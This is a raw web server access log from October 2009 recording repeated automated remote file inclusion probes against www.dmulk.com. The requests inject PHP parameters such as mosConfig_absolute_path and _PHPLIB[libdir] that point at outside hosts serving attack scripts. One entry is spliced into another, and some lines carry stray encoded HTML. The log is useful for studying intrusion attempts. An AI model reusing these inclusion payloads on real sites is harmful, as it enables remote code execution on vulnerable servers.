92.50.143.90 - - [30/Oct/2009:09:04:35 -0700] "GET /logs/access_080513.log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.rovest.com////language/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.123.88 - - [30/Oct/2009:09:04:36 -0700] "GET /logs/access_080226.log//?_zb_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:04:49 -0700] "GET /logs/access_090731.log%20%20/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:04:49 -0700] "GET /logs/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:04:49 -0700] "GET /_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:04:51 -0700] "GET /logs/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:04:51 -0700] "GET /logs/access_090731.log%20%20/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:04:51 -0700] "GET /_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:04:52 -0700] "GET /_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:04:53 -0700] "GET /logs/access_090731.log%20%20/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:04:53 -0700] "GET /_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:04:53 -0700] "GET /logs/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:04:53 -0700] "GET /logs/access_090731.log%20%20/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:04:53 -0700] "GET /logs/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:04:54 -0700] "GET /_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:04:54 -0700] "GET /logs/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:04:54 -0700] "GET /logs/access_090731.log/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:04:57 -0700] "GET /_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:04:57 -0700] "GET /logs/access_090731.log/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:04:58 -0700] "GET /logs/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:04:59 -0700] "GET /_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:04:59 -0700] "GET /_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:04:59 -0700] "GET /logs/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:04:59 -0700] "GET /logs/access_090731.log/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:05:00 -0700] "GET /logs/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:05:00 -0700] "GET /logs/access_090731.log/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:05:01 -0700] "GET /_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:05:01 -0700] "GET /logs/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:05:01 -0700] "GET /logs/access_090731.log/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:05:13 -0700] "GET /logs/access_090312.log/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:05:16 -0700] "GET /logs/access_090312.log/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:05:17 -0700] "GET /logs/access_090312.log/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
164.125.234.121 - - [30/Oct/2009:09:05:18 -0700] "GET /logs/access_080819.log//?_SERVER[DOCUMENT_ROOT]=http://ea3.fileave.com/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:05:19 -0700] "GET /logs/access_090312.log%20%20/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:05:19 -0700] "GET /logs/access_090312.log/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
164.125.234.121 - - [30/Oct/2009:09:05:19 -0700] "GET /logs/access_090501.log//?_SERVER[DOCUMENT_ROOT]=http://ea3.fileave.com/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:05:21 -0700] "GET /logs/access_090312.log%20%20/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:05:23 -0700] "GET /logs/access_090312.log/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:05:25 -0700] "GET /logs/access_090312.log%20%20/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.193.15.3 - - [30/Oct/2009:09:05:41 -0700] "GET /?_zb_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 200 16042 "-" "Mozilla/5.0" "www.dmulk.com"
82.193.15.3 - - [30/Oct/2009:09:05:41 -0700] "GET /logs//?_zb_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 200 123788 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:05:42 -0700] "GET /_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:05:42 -0700] "GET /logs/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:05:42 -0700] "GET /logs/access_090731.log/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.217.196.74 - - [30/Oct/2009:09:05:42 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 200 16077 "-" "Mozilla/5.0" "www.dmulk.com"
210.217.196.74 - - [30/Oct/2009:09:05:43 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 200 123789 "-" "Mozilla/5.0" "www.dmulk.com"
210.217.196.74 - - [30/Oct/2009:09:05:43 -0700] "GET /logs/access_090330.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.49.206.117 - - [30/Oct/2009:09:05:47 -0700] "GET /logs/access_090130.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://ea3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.49.206.117 - - [30/Oct/2009:09:05:48 -0700] "GET /logs/access_080710.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://ea3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:05:52 -0700] "GET /_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:05:52 -0700] "GET /logs/access_090731.log/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:05:53 -0700] "GET /logs/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:06:02 -0700] "GET /logs/access_090731.log/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:06:02 -0700] "GET /_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:06:02 -0700] "GET /logs/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:06:03 -0700] "GET /logs/access_090312.log/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.210.109.180 - - [30/Oct/2009:09:06:11 -0700] "GET /logs/access_080901.log//config.kochsuite.php?mosConfig_absolute_path=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:06:13 -0700] "GET /logs/access_090312.log%20%20/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:06:21 -0700] "GET /logs/access_090312.log/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.210.109.180 - - [30/Oct/2009:09:06:22 -0700] "GET /logs/access_080901.log//config.kochsuite.php?mosConfig_absolute_path=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:06:22 -0700] "GET /logs/access_090312.log/_PHPLIB[libdir]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.193.15.3 - - [30/Oct/2009:09:06:23 -0700] "GET /logs/access_080502.log%20%20//?_zb_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:07:23 -0700] "GET /_REQUEST=&_REQUEST%5boption%5d=com_banners&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:09:07:23 -0700] "GET /administrator/components/com_jcs/views/list.user.sub.html.php=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:09:07:23 -0700] "GET /logs/access_080619.log//administrator/components/com_jcs/views/list.user.sub.html.php=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:09:07:23 -0700] "GET /logs//administrator/components/com_jcs/views/list.user.sub.html.php=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:09:07:26 -0700] "GET /logs/access_080115.log HTTP/1.0" 200 606378 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.13.191.76 - - [30/Oct/2009:09:07:42 -0700] "GET /logs/access_080126.log%20%3C/span%3E%20%3Cspan%20class=rgy%3E%3C/span%3E%3Cbr%3E%3Ca%20class=rgy%20href='http://www.altavista.com/web/results?sc=off&q=%22%2Fwrite.php%3Fdir%3D%22+domain%3Admulk.com'%3EMore%20pages%20from%20dmulk.com%3C/a%3E %3Cbr%3E%3Cbr%3E%3Cbr%20class='lb'%3E%3Ca%20class='res'%20href='http://dir-i.mmuz.com/word/Savant2/Savant2_Plugin_textarea.php+abc_252Fwrite.php'%3ESavant2_Plugin_textarea.php%20abc/write.php%20+%20abc/write.php%20%3Cb%3E...%3C/b%3E%3C/a%3E%3Cbr%3E%3Cspan%20class=s%3Einclude/%3Cb%3Ewrite.php?dir%3C/b%3E=http%3Cwbr%3E://abc.%20%3Cb%3E...%3C/b%3E%20access.log/include/%3Cb%3Ewrite%3Cwbr%3E.php?dir%3C/b%3E=%22;http://www.the%20...%20404%20Not%20Found%20=%20/*include/%3Cb%3Ewrite.php?dir%3C/b%3E=http%3Cwbr%3E:/perdu.ch/cgi-bin%20%3Cb%3E...%3C/b%3E%3Cbr%3E%3C/span%3E%3Cspan%20class=ngrn%3Edir-i.mmuz.com/word/Savant2/Savant2_Plugin_textarea.php+abc_252Fwrite.php%20%3C/span%3E%20%3Cspan%20cdrhafouad/us1:41.237.53.112.78.14.2 - - [30/Oct/2009:09:07:50 -0700] "GET /logs/access_080619.log//administrator/components/com_jcs/views/list.user.sub.html.php=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:09:07:50 -0700] "GET /administrator/components/com_jcs/views/list.user.sub.html.php=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:09:07:50 -0700] "GET /logs//administrator/components/com_jcs/views/list.user.sub.html.php=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:09:07:50 -0700] "GET /logs/access_080209.log//administrator/components/com_jcs/views/list.user.sub.html.php=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [30/Oct/2009:09:08:21 -0700] "GET /logs/access_080710.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.rovest.com////language/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [30/Oct/2009:09:08:21 -0700] "GET /logs/access_080510.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.rovest.com////language/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:08:40 -0700] "GET /_REQUEST=&_REQUEST%5boption%5d=com_banners&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:08:42 -0700] "GET /_REQUEST=&_REQUEST%5boption%5d=com_banners&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:09:09:01 -0700] "GET /logs//administrator/components/com_jcs/views/list.user.sub.html.php=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:09:09:01 -0700] "GET /logs/access_080619.log//administrator/components/com_jcs/views/list.user.sub.html.php=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:09:09:01 -0700] "GET /administrator/components/com_jcs/views/list.user.sub.html.php=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:09:09:01 -0700] "GET /logs/access_080209.log//administrator/components/com_jcs/views/list.user.sub.html.php=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:09:07 -0700] "GET /_REQUEST=&_REQUEST%5boption%5d=com_banners&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.13.191.76 - - [30/Oct/2009:09:09:16 -0700] "GET /logs/access_090612.log%20%3C/span%3E%20%3Cspan%20class=rgy%3E%3C/span%3E%3Cbr%3E%3Ca%20class=rgy%20href='http://www.altavista.com/web/results?sc=off&q=%22%2Fwrite.php%3Fdir%3D%22+domain%3Admulk.com'%3EMore%20pages%20from%20dmulk.com%3C/a%3E %3Cbr%3E%3Cbr%3E%3Cbr%20class='lb'%3E%3Ca%20class='res'%20href='http://www.womenskiss.org/logs/access_091008.log'%3E<!DOCTYPE%20xhtml%20PUBLIC%20//include/write.php?dir=http://0pop.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:09:26 -0700] "GET /logs/_REQUEST=&_REQUEST%5boption%5d=com_banners&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:09:26 -0700] "GET /logs/access_081202.log/_REQUEST=&_REQUEST%5boption%5d=com_banners&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:09:27 -0700] "GET /logs/access_090326.log/_REQUEST=&_REQUEST%5boption%5d=com_banners&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.230.123.88 - - [30/Oct/2009:09:09:28 -0700] "GET /logs/access_090501.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.123.88 - - [30/Oct/2009:09:09:28 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 200 123788 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.123.88 - - [30/Oct/2009:09:09:29 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 200 16061 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:09:43 -0700] "GET /logs/_REQUEST=&_REQUEST%5boption%5d=com_banners&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:09:44 -0700] "GET /logs/access_090326.log/_REQUEST=&_REQUEST%5boption%5d=com_banners&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:09:44 -0700] "GET /logs/access_081202.log/_REQUEST=&_REQUEST%5boption%5d=com_banners&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.230.123.88 - - [30/Oct/2009:09:09:48 -0700] "GET /logs/access_080710.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:09:51 -0700] "GET /logs/access_081202.log/_REQUEST=&_REQUEST%5boption%5d=com_banners&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:09:51 -0700] "GET /logs/access_090326.log/_REQUEST=&_REQUEST%5boption%5d=com_banners&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:09:51 -0700] "GET /logs/_REQUEST=&_REQUEST%5boption%5d=com_banners&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:09:57 -0700] "GET /logs/_REQUEST=&_REQUEST%5boption%5d=com_banners&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:09:57 -0700] "GET /logs/access_081202.log/_REQUEST=&_REQUEST%5boption%5d=com_banners&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:09:57 -0700] "GET /logs/access_090326.log/_REQUEST=&_REQUEST%5boption%5d=com_banners&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.143.249 - - [30/Oct/2009:09:10:04 -0700] "GET /logs/access_080602.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://perl.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.143.249 - - [30/Oct/2009:09:10:04 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://perl.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.143.249 - - [30/Oct/2009:09:10:04 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://perl.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.143.249 - - [30/Oct/2009:09:10:08 -0700] "GET /logs/access_080422.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://perl.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
196.40.58.10 - - [30/Oct/2009:09:10:18 -0700] "GET /logs/access_080304.log//?path%5Bdocroot%5D=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
196.40.58.10 - - [30/Oct/2009:09:10:18 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 200 123788 "-" "Mozilla/5.0" "www.dmulk.com"
196.40.58.10 - - [30/Oct/2009:09:10:19 -0700] "GET /?path%5Bdocroot%5D=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 200 16051 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.46.179 - - [30/Oct/2009:09:10:55 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://perl.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.46.179 - - [30/Oct/2009:09:10:55 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://perl.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.46.179 - - [30/Oct/2009:09:10:55 -0700] "GET /logs/access_090702.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://perl.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.46.179 - - [30/Oct/2009:09:10:55 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://perl.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.46.179 - - [30/Oct/2009:09:10:55 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://perl.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.46.179 - - [30/Oct/2009:09:10:55 -0700] "GET /logs/access_090702.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://perl.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
